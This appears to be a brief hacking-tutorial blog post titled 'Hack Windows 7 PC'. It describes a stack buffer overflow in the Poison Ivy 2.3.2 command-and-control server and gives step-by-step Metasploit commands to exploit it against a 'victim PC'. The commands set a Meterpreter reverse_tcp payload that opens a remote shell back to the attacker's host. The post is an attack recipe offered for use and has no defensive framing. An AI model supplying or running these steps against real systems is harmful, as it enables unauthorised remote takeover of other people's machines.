Hack Windows 7 PC with Poison Ivy 2.3.2 C&C Server Buffer Overflow

This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default ‘admin’ password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The ‘check’ command can be used to determine if the C&C target is using the default ‘admin’ password. Hopefully an exploit try won’t crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the brute force target is selected, a random header will be sent in case the default for the password ‘admin’ doesn’t work. Bruteforce will stop after 5 tries or a session obtained.

Exploit Targets

Poison Ivy 2.3.2

Windows XP SP 2

Windows 7


Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/misc/poisonivy_bof

Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (poisonivy_bof)>set lhost (IP of Local Host)

Msf exploit (poisonivy_bof)>set rhost (IP of Victim PC)

Msf exploit (poisonivy_bof)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *